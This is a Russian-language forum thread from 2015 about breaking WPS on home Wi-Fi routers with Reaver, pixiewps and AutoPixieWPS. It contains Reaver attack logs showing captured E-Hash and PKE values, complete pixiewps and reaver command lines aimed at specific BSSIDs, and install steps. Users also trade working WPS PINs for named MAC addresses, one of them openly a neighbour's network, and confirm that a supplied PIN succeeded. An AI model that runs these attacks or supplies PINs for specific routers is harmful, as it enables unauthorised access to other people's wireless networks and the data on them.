короче,всё получилось(не тот просто видимо ривер ставил),но вопрос возник:там при переборе пинов,на каждый пин разная информация(хешы и тд разные),так какие ж хешы подставлять,с самого первого пина,или скажем....с четвёртого?т.е информация абсолютно разная....что,все хешы пробовать что ли?))
ну вот,вот какие хешы выбирать?
Reaver v1.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 6
[+] Waiting for beacon from A0:F3:C1:44:A7:4A
[+] Associated with A0:F3:C1:44:A7:4A (ESSID: Piramida)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: f7:87:9b:b3:a9:8b:2a:0d:2d:99:b4:e4:ca:77:72:d5
[P] PKE: 75:6e:e5:08:f0:a5:a5:29:be:57:6b:c3:96:4c:8f:96:0f :97:c9:0c:76:19:8d:f0:92:44:52:30:b8:e5:1d:0e:30:2 b:eb:42:28:5f:85:74:64:36:25:c5:02:12:13:a5:91:76: 9f:ce:54:ea:0a:e2:24:2a:f1:81:89:6d:ed:a3:c1:a7:7e :bc:ae:92:48:79:1e:7f:99:c9:50:77:89:92:65:04:f9:1 a:c3:9d:6d:42:9f:65:2b:2e:13:04:a9:83:0d:0f:a2:35: db:34:c4:81:74:3d:9c:5b:06:c4:bf:73:ee:9b:c7:5a:f4 :8a:4d:6b:bd:c9:50:91:0f:61:56:53:1a:ad:59:c5:30:b d:19:b6:6f:ba:1a:22:ef:20:db:08:fc:5b:1c:5e:e4:d3: 1f:c5:84:54:87:07:ed:c1:84:74:ae:31:dd:cd:35:64:aa :42:43:c7:61:79:8b:bb:c8:3b:50:3f:d9:08:86:d2:95:d b:2a:12:49:c3:6a:fe:e2:f7
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 4.0
[+] Received M1 message
[P] AuthKey: 40:11:dd:34:20:c1:a8:4e:95:5c:f9:18:e8:46:03:dd:96 :30:5f:55:8c:e2:c3:c8:23:a0:07:ea:09:42:56:b0
[+] Sending M2 message
[P] E-Hash1: 44:5e:8a:80:54:d2:5f:c9:4d:c9:4d:c2:16:35:2a:9a:34 :c1:94:3e:94:4e:a2:aa:2a:af:ba:11:b8:d5:a6:5e
[P] E-Hash2: 7f:c7:a5:23:8a:9e:c0:ba:70:14:49:97:63:27:36:58:65 :2e:99:43:44:d1:c6:86:b6:01:aa:66:57:78:44:7e
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 1
[+] Pin count advanced: 1. Max pin attempts: 11000
C[+] Trying pin 00005678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: da:35:7b:33:f5:1d:57:82:38:19:42:24:b6:1b:26:5b
[P] PKE: 44:4c:72:cb:2e:10:6a:5b:6a:4b:d4:5a:d9:24:2e:19:87 :63:d5:6a:8a:ae:56:66:52:45:79:22:85:65:27:5b:88:4 f:1b:7a:5e:7f:06:a8:23:a6:57:eb:f7:47:96:b2:8d:47: 93:1b:17:a2:8e:df:8e:d5:42:41:69:78:9a:b6:90:0e:3a :3f:74:2a:ed:d3:e7:36:05:22:75:0d:c2:75:ef:e9:f9:3 e:d9:0f:6c:67:90:00:f6:6a:cb:27:a9:75:c7:9d:e0:de: 19:23:b3:ff:5d:78:ed:21:fd:e1:7e:52:de:00:76:65:44 :c8:d8:0b:54:98:09:25:30:77:9c:cf:f1:43:df:19:83:8 5:ff:77:83:4f:fe:e5:a3:7b:ef:e1:7f:74:56:46:93:e2: b9:de:68:59:3b:46:11:b7:b0:b4:05:0d:08:07:a9:93:d7 :ee:46:73:fc:dd:0e:33:c5:c0:27:55:88:8f:89:ad:26:4 a:c9:aa:d8:ff:0b:59:04:2f
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 4.0
[+] Received M1 message
[P] AuthKey: 6c:05:6f:5e:c7:dc:74:94:b7:4e:b0:52:92:7d:93:cb:74 :14:c6:55:bd:6c:05:dc:b4:71:91:7e:c2:aa:93:ba
[+] Sending M2 message
C[P] E-Hash1: 99:27:43:d0:9f:97:f8:f0:e1:da:d1:1f:47:11:c4:96:78 :33:ae:7a:2e:13:19:9f:5b:eb:94:2f:87:27:0a:2c
[P] E-Hash2: 98:e5:4e:48:d7:03:f0:ca:98:a3:f1:9a:38:b7:8f:68:63 :20:2a:9a:84:b6:dd:32:51:56:d2:14:9b:33:fd:55
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 2
[+] Pin count advanced: 2. Max pin attempts: 11000
^C
[+] Session saved.
PKE: 75:6e:e5:08:f0:a5:a5:29:be:57:6b:c3:96:4c:8f:96:0f :97:c9:0c:76:19:8d:f0:92:44:52:30:b8:e5:1d:0e:30:2 b:eb:42:28:5f:85:74:64:36:25:c5:02:12:13:a5:91:76: 9f:ce:54:ea:0a:e2:24:2a:f1:81:89:6d:ed:a3:c1:a7:7e :bc:ae:92:48:79:1e:7f:99:c9:50:77:89:92:65:04:f9:1 a:c3:9d:6d:42:9f:65:2b:2e:13:04:a9:83:0d:0f:a2:35: db:34:c4:81:74:3d:9c:5b:06:c4:bf:73:ee:9b:c7:5a:f4 :8a:4d:6b:bd:c9:50:91:0f:61:56:53:1a:ad:59:c5:30:b d:19:b6:6f:ba:1a:22:ef:20:db:08:fc:5b:1c:5e:e4:d3: 1f:c5:84:54:87:07:ed:c1:84:74:ae:31:dd:cd:35:64:aa :42:43:c7:61:79:8b:bb:c8:3b:50:3f:d9:08:86:d2:95:d b:2a:12:49:c3:6a:fe:e2:f7
E-Hash1: 99:27:43:d0:9f:97:f8:f0:e1:da:d1:1f:47:11:c4:96:78 :33:ae:7a:2e:13:19:9f:5b:eb:94:2f:87:27:0a:2c
E-Hash2: 98:e5:4e:48:d7:03:f0:ca:98:a3:f1:9a:38:b7:8f:68:63 :20:2a:9a:84:b6:dd:32:51:56:d2:14:9b:33:fd:55
AuthKey: 6c:05:6f:5e:c7:dc:74:94:b7:4e:b0:52:92:7d:93:cb:74 :14:c6:55:bd:6c:05:dc:b4:71:91:7e:c2:aa:93:ba
все , что тебе нужно
и я тебя огорчу. данный TP-LINK не ломается. я только что прогнал этот pixiewps по твоим данным...
pixiewps -e 44:4c:72:cb:2e:10:6a:5b:6a:4b:d4:5a:d9:24:2e:19:87 :63:d5:6a:8a:ae:56:66:52:45:79:22:85:65:27:5b:88:4 f:1b:7a:5e:7f:06:a8:23:a6:57:eb:f7:47:96:b2:8d:47: 93:1b:17:a2:8e:df:8e:d5:42:41:69:78:9a:b6:90:0e:3a :3f:74:2a:ed:d3:e7:36:05:22:75:0d:c2:75:ef:e9:f9:3 e:d9:0f:6c:67:90:00:f6:6a:cb:27:a9:75:c7:9d:e0:de: 19:23:b3:ff:5d:78:ed:21:fd:e1:7e:52:de:00:76:65:44 :c8:d8:0b:54:98:09:25:30:77:9c:cf:f1:43:df:19:83:8 5:ff:77:83:4f:fe:e5:a3:7b:ef:e1:7f:74:56:46:93:e2: b9:de:68:59:3b:46:11:b7:b0:b4:05:0d:08:07:a9:93:d7 :ee:46:73:fc:dd:0e:33:c5:c0:27:55:88:8f:89:ad:26:4 a:c9:aa:d8:ff:0b:59:04:2f -s 99:27:43:d0:9f:97:f8:f0:e1:da:d1:1f:47:11:c4:96:78 :33:ae:7a:2e:13:19:9f:5b:eb:94:2f:87:27:0a:2c -z 98:e5:4e:48:d7:03:f0:ca:98:a3:f1:9a:38:b7:8f:68:63 :20:2a:9a:84:b6:dd:32:51:56:d2:14:9b:33:fd:55 -a 6c:05:6f:5e:c7:dc:74:94:b7:4e:b0:52:92:7d:93:cb:74 :14:c6:55:bd:6c:05:dc:b4:71:91:7e:c2:aa:93:ba -S
и я тебя огорчу. данный TP-LINK не ломается. я только что прогнал этот pixiewps по твоим данным...
pixiewps -e 44:4c:72:cb:2e:10:6a:5b:6a:4b:d4:5a:d9:24:2e:19:87 :63:d5:6a:8a:ae:56:66:52:45:79:22:85:65:27:5b:88:4 f:1b:7a:5e:7f:06:a8:23:a6:57:eb:f7:47:96:b2:8d:47: 93:1b:17:a2:8e:df:8e:d5:42:41:69:78:9a:b6:90:0e:3a :3f:74:2a:ed:d3:e7:36:05:22:75:0d:c2:75:ef:e9:f9:3 e:d9:0f:6c:67:90:00:f6:6a:cb:27:a9:75:c7:9d:e0:de: 19:23:b3:ff:5d:78:ed:21:fd:e1:7e:52:de:00:76:65:44 :c8:d8:0b:54:98:09:25:30:77:9c:cf:f1:43:df:19:83:8 5:ff:77:83:4f:fe:e5:a3:7b:ef:e1:7f:74:56:46:93:e2: b9:de:68:59:3b:46:11:b7:b0:b4:05:0d:08:07:a9:93:d7 :ee:46:73:fc:dd:0e:33:c5:c0:27:55:88:8f:89:ad:26:4 a:c9:aa:d8:ff:0b:59:04:2f -s 99:27:43:d0:9f:97:f8:f0:e1:da:d1:1f:47:11:c4:96:78 :33:ae:7a:2e:13:19:9f:5b:eb:94:2f:87:27:0a:2c -z 98:e5:4e:48:d7:03:f0:ca:98:a3:f1:9a:38:b7:8f:68:63 :20:2a:9a:84:b6:dd:32:51:56:d2:14:9b:33:fd:55 -a 6c:05:6f:5e:c7:dc:74:94:b7:4e:b0:52:92:7d:93:cb:74 :14:c6:55:bd:6c:05:dc:b4:71:91:7e:c2:aa:93:ba -S
так а хешы какие выбирать,они ж разные......после первого пина одни данные,после другого пина другие данные и тд......так какие хешы то подставлять?
-bI-, та вот блин не пойму, я запускаю airmon-ng
-bI-, та вот блин не пойму, я запускаю airmon-ng
Причём здесь airmon-ng. Человек спрашивает о другом. Согласно видео данные брались с первого перебора, но кто-то выше написал, что ждал несколько переборов и в одном из них удалось поймать пин. Значит он запускал pixiewps для каждого перебора по очереди. Я так понял.
vedemur, к чему Ваш пост ?, airmon-ng адресован другому.
p.s. читайте внимательней.
vedemur, к чему Ваш пост ?, airmon-ng адресован другому.
p.s. читайте внимательней.
Извиняюсь, не обратил внимание, что есть такой пользователь под именем -bI-. А то, что написал в посте 2446 касается СЕРЖ32.
Я никак не пойму когда пишется sudo, а когда нет, объясните п.ж. И ещё, есть интересное здесь http://matthewhknight.com/autopixiewps/
1.
sudo apt-get install libssl-dev
sudo apt-get install libpcap-dev
sudo apt-get install libsqlite3-dev
cd reaver-wps-fork-read-only/src
chmod 775 configure
./configure
make
make install
2.
pixiewps-master/src
make
make install
" chmod 775 " я вводил это
libssl-dev устанавливается в Kali Linux версии ниже 1,1,0, а начиная с версии 1,1,0 и выше не надо-уже учтено.
binarymaster
12.04.2015, 14:47
Я никак не пойму когда пишется sudo, а когда нет, объясните п.ж.
Зависит от случая. Sudo используется для выполнения команд под root (читай с правами администратора). Если вы уже зашли в систему под пользователем root, использование sudo не обязательно.
Vikhedgehog
14.04.2015, 01:07
Кто-нибудь знает пин код от роутера ZyXEL NBG460N-EE? Думал что алгоритм как у кинетиков, а оказалось нет. Лока WPS вроде нет, но что-то я не привык тратить 10 часов на взлом зухеля
Кто-нибудь знает пин код от роутера ZyXEL NBG460N-EE? Думал что алгоритм как у кинетиков, а оказалось нет. Лока WPS вроде нет, но что-то я не привык тратить 10 часов на взлом зухеля
Один только есть
40:4A:03:8D:4D:30
46883346
и еще нашелся
40:4A:03:8D:51:0C
22648808
что то тема не развивается по pixiewps,видимо не эффективная прога,или для малого количества точек....Кому ещё удавалось пин вытащить?какие это точки были(бренды).
была бы эта софтина под винду, а ещё лучше автоматизированный гуй с функцией авторматического парсинга хешей из cap файла, я попробовал бы её работу на разных точках. просто нет никакого желания ставить линукс ради одного скрипта.
была бы эта софтина под винду, а ещё лучше автоматизированный гуй с функцией авторматического парсинга хешей из cap файла, я попробовал бы её работу на разных точках. просто нет никакого желания ставить линукс ради одного скрипта.
пха...а зачем линукс ставить? с виртуалки запускай...
кстати вышел автоскрипт AutoPixieWPS.
Что PixieWPS, что AutoPixieWPS-результат одинаковый- pin not found. Использую Kali Linux с флешки.
кто уже тестил
AutoPixieWps?не понял,как его запускать,вроде команды уже другие какие то,не так запускается,как PixieWps,подскажите...
кто уже тестил
AutoPixieWps?не понял,как его запускать,вроде команды уже другие какие то,не так запускается,как PixieWps,подскажите...
Всё то-же, только надо доустановить скрипт AutoPixieWps и далее по видео.
Хм.....что то не получается:как доустановить скрипт AutoPixieWps?ну скачал скрипт,как его доустановить?и как потом вообще запускать AutoPixieWps?видео по нему нет,не видел...как запускать просто PixieWps понятно,а как именно AutoPixieWps?
Хм.....что то не получается:как доустановить скрипт AutoPixieWps?ну скачал скрипт,как его доустановить?и как потом вообще запускать AutoPixieWps?видео по нему нет,не видел...как запускать просто PixieWps понятно,а как именно AutoPixieWps?
Доустановить что простите?
Запуск скрипта всего из 2х строчек в консоле.
1. Даем права на исполнение скрипта:
chmod +x autopixie.py
2. Запускаем сам скримпт:
./autopixie.py
Какие у вас проблемы со скриптом?
Доустановить что простите?
Запуск скрипта всего из 2х строчек в консоле.
1. Даем права на исполнение скрипта:
chmod +x autopixie.py
2. Запускаем сам скримпт:
./autopixie.py
Какие у вас проблемы со скриптом?
так а что должно появится при запуске этого скрипта?меню какое то?я просто не понимаю как работает autopixie.....можно скрин хотя бы(видео лучше было б конечно)запуска этого скрина.Вообще,в чём отличие в работе от просто pixiewps?
так а что должно появится при запуске этого скрипта?меню какое то?я просто не понимаю как работает autopixie.....можно скрин хотя бы(видео лучше было б конечно)запуска этого скрина.Вообще,в чём отличие в работе от просто pixiewps?
http://sh.uploads.ru/t/Ce3kK.png
http://sh.uploads.ru/t/Ce3kK.png
спасибо!вот это другое дело)
спасибо!вот это другое дело)
вот у меня такого меню нет,значит не запускается.....
Доустановить что простите?
Запуск скрипта всего из 2х строчек в консоле.
1. Даем права на исполнение скрипта:
chmod +x autopixie.py
2. Запускаем сам скримпт:
./autopixie.py
Какие у вас проблемы со скриптом?
Первым будет: cd (пробел) и перетянуть папку AutoPixie.py и далее как описано, тогда получится.
Первым будет: cd (пробел) и перетянуть папку AutoPixie.py и далее как описано, тогда получится.
так и делал,всё равно что то не запускается,т.е такого меню(зелёного)нет...
так и делал,всё равно что то не запускается,т.е такого меню(зелёного)нет...
типа пишет:не та дериктория или что то в этом роде,ну так копирую в Home,непонимаю в чём проблема....
Да из папки HOME перетяни и далее как я написал выше. Что не понятного? Ну посмотри видео где качал скрипт в конце концов.
binarymaster
17.04.2015, 20:51
Хм.....что то не получается:как доустановить скрипт AutoPixieWps?ну скачал скрипт,как его доустановить?и как потом вообще запускать AutoPixieWps?видео по нему нет,не видел...как запускать просто PixieWps понятно,а как именно AutoPixieWps?
Тут всё пошагово описано:
http://matthewhknight.com/autopixiewps/
Тут всё пошагово описано:
http://matthewhknight.com/autopixiewps/
спасибо!вот это то,как надо))
Vikhedgehog
24.04.2015, 17:43
На новых прошивках ZyXEL Keenetic в настройках WPS появилась новая опция, разрешающая использовать PIN код. По умолчанию опция выключена, а на улицах стали появляться кинетики без WPS. Это значит что взлому зюхелей пришел конец?
Сейчас обновил свой кинетик 4G II, действительно, больше не взламывается. Так что вот так.
А вот что делать с роутерами ZTE у которых включен wps, но по wps они не ломаются т.к его там просто нету ? Живу в частном секторе, такой дряни от байфлая уйма вокруг. Должна же быть какая-то лазейка?
Vikhedgehog
25.04.2015, 00:47
А вот что делать с роутерами ZTE у которых включен wps, но по wps они не ломаются т.к его там просто нету ? Живу в частном секторе, такой дряни от байфлая уйма вокруг. Должна же быть какая-то лазейка?
Как правило если провайдерский роутер не ломается по WPS, то у него пароль сгенерирован по алгоритму, либо открыт порт 80. По крайней мере так в мск.
Как правило если провайдерский роутер не ломается по WPS, то у него пароль сгенерирован по алгоритму, либо открыт порт 80. По крайней мере так в мск.
Рядом есть два таких:
CC:7B:35
2C:95:7F
wps включен, но пин-кода у них нету, ловил хендшейки, но они не раскалываются, какие практические действия чтобы вскрыть?
Подскажите п.ж. как бороться с роутерами, у которых после 16-18 пинов WPS Lock переключается с No на Yes и перебор на этом заканчивается. Заранее спасибо.
Здравствуйте.
Подскажите, при взломе ривером через перебор пинов при остановке взлома сессия сохраняется и при возобновлении продолжается с того же места. Ломаю с помощью загрузочного диска Бэк Трэк. Можно ли как нибудь сохранить эту сессию на комп или флешку, чтобы после перезагрузки компа продолжить оттуда же. Ломается сеть очень долго, 10% только за ночь.
сохранить эту сессию
/usr/local/etc/reaver
W@rdrive
09.05.2015, 01:04
Кто-то имел дело с Асусами типа 50:46:5d:86:**:** или 50:46:5d:87:**:**? Никак не могу найти алгоритм генерации пина, а после десяти попыток он лочится. Подобрал пару паролей брутом, а вот с WPS - засада
sergey289
11.05.2015, 22:32
Здравствуйте! Подскажите, пожалуйста, пин для двух роутеров (или хотя бы для одного)
DIR-615
MAC: 90:94:E4:33:2F:9E
NETGEAR (WNR1000v2)
MAC: E0:46:9A:5CA:68
Спасибо.
binarymaster
12.05.2015, 01:14
DIR-615
MAC: 90:94:E4:33:2F:9E
Попробуйте 33545264 и 33814827.
CRACK211
12.05.2015, 10:14
Подскажите подалйста правильно я вввел команду которую он предложил? И есть ли еще команды комбинации крманд чтобы попробовать?
[-] WPS pin not found!
Time taken: 6 s
[!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.
root@kali:~/Desktop/pixiewps-master/src# pixiewps -e ff:cb:8c:48:6d:7f:b1:8a:83:a0:d3:93:c8:7b:50:86:a6 :8c:51:67:2c:62:6f:cf:e2:7c:2f:9d:72:98:62:4b:37:d d:31:3c:b4:38:07:bc:e6:f7:83:f2:13:e3:44:77:c0:7e: 1d:55:0f:8a:b4:79:16:df:e4:a0:c5:e5:24:40:9a:a8:da :d2:6c:6e:72:fb:ae:b4:d7:87:86:60:21:91:08:ac:cf:7 f:99:19:06:2b:41:93:06:64:ba:a9:1f:35:91:9f:ee:65: f0:d4:d3:f8:21:7b:67:57:a8:9b:5d:92:06:94:53:3a:fc :35:6e:21:e7:d4:1a:0e:c4:9c:05:66:ca:06:71:3c:9b:f f:60:44:e4:62:ab:a1:37:ec:2b:02:44:52:18:81:1d:8d: 6a:a8:2d:df:a8:ec:79:bb:47:97:f5:dd:4d:c4:ae:24:2d :b7:e7:3c:7b:ef:f8:f6:5a:6b:59:06:ac:c8:f2:c0:30:6 b:03:eb:cd:bb:9a:e4:c1:04 -s 91:d5:dd:a0:4f:83:f4:0d:d6:a3:67:8c:8d:0a:71:b9:25 :9d:9d:bd:b5:38:73:0e:fe:a1:79:e9:eb:6a:83:28 -z 2a:90:57:a8:bc:be:5a:d8:a9:76:31:f2:fa:35:b0:07:b6 :99:fc:cc:84:bd:90:a8:fb:5b:d7:09:a8:84:54:0f -a 1d:bf:b3:26:c2:32:88:78:9a:47:4e:46:f0:2a:1d:17:eb :b4:5e:2f:38:61:02:48:4e:d0:ff:9b:47:4c:63:6a -n 32:26:00:00:00:00:00:00:00:00:00:00:00:00:00:00 -S -f 4
sergey289
13.05.2015, 20:34
Попробуйте 33545264 и 33814827.
Спасибо, но, к сожалению не подходит. А с netgear никак?
resident148
14.05.2015, 20:34
sergey289
Длинк хорошо перебирается ривером, как и нетгир. Еще wps pixie хорошо с длинками работает
Anton91x
15.05.2015, 11:24
Здравствуйте! Подскажите, пожалуйста, пин для двух роутеров (или хотя бы для одного)
DIR-615
MAC: 90:94:E4:33:2F:9E
NETGEAR (WNR1000v2)
MAC: E0:46:9A:5CA:68
Спасибо.
На dlink еще пины 04633907, 85597747, 44994518 можете попробовать
Anton91x
15.05.2015, 11:41
Здравствуйте, соседский wifi сигнал 100%
ssid Dlink
mac c8:d3:a3:ce:4d:f6 (DSL 2750U судя по маку)
если кто имел дело с этим роутером подскажите пин или алгоритм, по которому он генерируется
уже пробовал 21464065, 35203742, 21747229, 62327145 после 10 пинов он локнулся
pixiewps pin not found! хотя чипсет у него broadcom
Здравствуйте, соседский wifi сигнал 100%
ssid Dlink
mac c8:d3:a3:ce:4d:f6 (DSL 2750U судя по маку)
если кто имел дело с этим роутером подскажите пин или алгоритм, по которому он генерируется
уже пробовал 21464065, 35203742, 21747229, 62327145 после 10 пинов он локнулся
pixiewps pin not found! хотя чипсет у него broadcom
1708421
Anton91x
15.05.2015, 21:19
1708421
Спасибо, проверю когда точка выйдет из лока. А как Вы рассчитываете pin?
Может кому пригодится хороший генератор пинов под андроид https://play.google.com/store/apps/details?id=com.ngb.wpsconnect содержит большую базу данных
sergey289
17.05.2015, 16:41
04633907, 85597747, 44994518
Тоже не подходят.
sergey289
Длинк хорошо перебирается ривером, как и нетгир. Еще wps pixie хорошо с длинками работает
Спасибо за совет, но я в этом мало что понимаю . Думал, может получится по алгоритмам вычислить пин.
resident148
17.05.2015, 19:45
Спасибо за совет, но я в этом мало что понимаю
Тогда советую записать на флешку образ wifislax, и воспользоваться утилитой goyscript из представленных в образе, там практически все автоматизировано
Может кто и мне подскажет - асус rt-n12c1
10:bf:48:92:95:70
9606512 не сработал.
Или вот для этого c4:6e:1f:6d:d7:b1
Опять же 7198641 не хочет принимать :-(
Заранее спасибо за любые идеи
Anton91x
18.05.2015, 23:44
Может кто и мне подскажет - асус rt-n12c1
10:bf:48:92:95:70
9606512 не сработал.
Или вот для этого c4:6e:1f:6d:d7:b1
Опять же 7198641 не хочет принимать :-(
Заранее спасибо за любые идеи
Для асуса попробуйте 75660642
Для асуса попробуйте 75660642
Спасибо! Попробовал
Но в ответ асус лишь тихо залочился. Не тот...
Спасибо, проверю когда точка выйдет из лока. А как Вы рассчитываете pin?
у меня маленький листочек с пинами dlink взял на ачате вроде
henri2002
20.05.2015, 17:59
а здесь не совпало.
AC:22:0B:BB:CA:00 27354001 ASUS RT-N10E
AC:22:0B:ECC:00 44364045 ASUS RT-N10E
5 и 6 цифры совпали) если искать по концу мака совпадения, то они явно есть, так как пины в тех местах или совпадают, или там близкие числа - 56, 58, 63 например
Vikhedgehog
20.05.2015, 20:11
Скиньте возможные пин коды от 60:A4:4C:XX:XX:4C если у кого-то есть. Благодарю)
VladimirV
20.05.2015, 20:38
Я заметил совпадения давно.
Проверял в командировках, и ломал ASUSы по WPS. Бывает совпадет первая половина пина. Бывает полностью.
Это лучше чем ничего!
И, я думал натолкнуть кого-то на мысль по взлому алгоритма!
VladimirV
20.05.2015, 20:39
Скиньте возможные пин коды от 60:A4:4C:XX:XX:4C если у кого-то есть. Благодарю)
Таких в моей базе нет.
Vikhedgehog
20.05.2015, 21:20
Таких в моей базе нет.
Не знаете, у более дорогих роутеров типа RT-N66U такая же закономерность или ее нет?
VladimirV
20.05.2015, 21:41
Не знаете, у более дорогих роутеров типа RT-N66U такая же закономерность или ее нет?
Сверяйте сами. Сделано с базы порядка 230 000. Спасибо Sheez и Payer.
http://rghost.ru/private/8dFPRN2rT/42ab7e28beb4cedac0c5ce35697fb9b3
У Dlinkов тоже есть совпадения но сделаю позже!
Совпадение? Не думаю
http://s011.radikal.ru/i318/1505/63/1e87ca3ebf03.png
хорошо бы базу от дублей почистить
Mac c0:4a:00:f4:f8:e4
Не подскажете пин?
Stalker5
21.05.2015, 23:34
MAC F0:7D:68:91:5B:C8
Название точки D-link
Можете подсказать пин? Заранее Спасибо!
VladimirV
21.05.2015, 23:57
MAC F0:7D:68:91:5B:C8
Название точки D-link
Можете подсказать пин? Заранее Спасибо!
Это DIR-300 генераторов к нему нет. Он должен нормально перебираться полным перебором.
Stalker5
21.05.2015, 23:59
я не помню точно, по-моему там мне писало AP rate limited и т.д., вообщем точка банила меня. Попробую ещё раз, может это с другой точкой было, хорошо хоть сигнал хороший.
Спасибо, проверю когда точка выйдет из лока. А как Вы рассчитываете pin?
Может кому пригодится хороший генератор пинов под андроид https://play.google.com/store/apps/details?id=com.ngb.wpsconnect содержит большую базу данных
у меня в андроиде постоянно прописаны 2 программы Wps Connect и Wps Wpa Tester. по сути одинаковы но базы немного отличаются,в общем и с андроидом можно жить.
единственное там root права нужны,но это другая история
Асус
10:BF:48 : 91 : D1 : 9C
Похожие маки кому попадались и с какими пинами?
Stalker5
23.05.2015, 21:25
DIR-620_C
90:94:E4:EE:E7:BC
Есть ПИН?
resident148
23.05.2015, 21:31
Асус
10:BF:48:91 : D1 : 9C
30638402 пин к этому роутеру, поправка - 75159320 (пробелы от палева не спасут, не усложняйте простые ситуации)
VladimirV
23.05.2015, 21:32
DIR-620_C
90:94:E4:EE:E7:BC
Есть ПИН?
reaver -i mon0 -b 90:94:E4:EE:E7:BC -vv -c -p5656892
Последнюю цифру ривер добавит сам.
resident148
23.05.2015, 21:33
DIR-620_C
90:94:E4:EE:E7:BC
Есть ПИН?
dlink хорошо подбирается ривером и pixiewps, этот еще и подсказали уже
Stalker5
23.05.2015, 21:49
Окей, попробую.
Vikhedgehog
23.05.2015, 22:31
Ну вообще бывает иногда что новые модели лочатся, например у кого-то из соседей был такой DIR-615, правда без пароля)
Anton91x
24.05.2015, 22:34
1708421
Пин подошел, большое спасибо
binarymaster
26.05.2015, 00:45
Вообщем вот что мне выдало, после атаки на одну из точек
Так и есть, сигнал слишком низкий.
Так и есть, сигнал слишком низкий.
а какой уровень сигнала считается приемлимым для данной атаки?
Обычно -80 и ниже, причем точка должна слышать устройство приблизительно на таком же уровне. Но это сильно зависит от чипа в роутере и чипа в клиентском устройстве.
Пожалуйста помогите с подбором wps pin
Mac D4:21:22:32:1C:9A
Beeline smart box или
Mac 90:f6:52:99:AA:B6
Tl-WR1043ND
binarymaster
27.05.2015, 02:31
Про Onlime было?
Уже давно известный факт.
Число в ESSID - это номер квартиры.
Уже давно известный факт.
Число в ESSID - это номер квартиры.
Ну что же - баяню
Где то бы систематизировать бы все.
Удалил
Serge2000
27.05.2015, 14:56
Есть две сетки на TPlink-ах. WPS постоянно лочиться. Пробовал подбирать пин через GeneratorWPSPIN но не помогло. Может у кого-то будут еще варианты возможных пинов или тут все печально?
Точки:
Raketa E8:94:F6:4A:92:8A (TL_WR840N)
kyivstar68 E8:94:F6:CE:4C:E2 (TL_WR741ND)
henri2002
27.05.2015, 15:30
для туполинков нет известных алгоритмов генерации пина впс.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot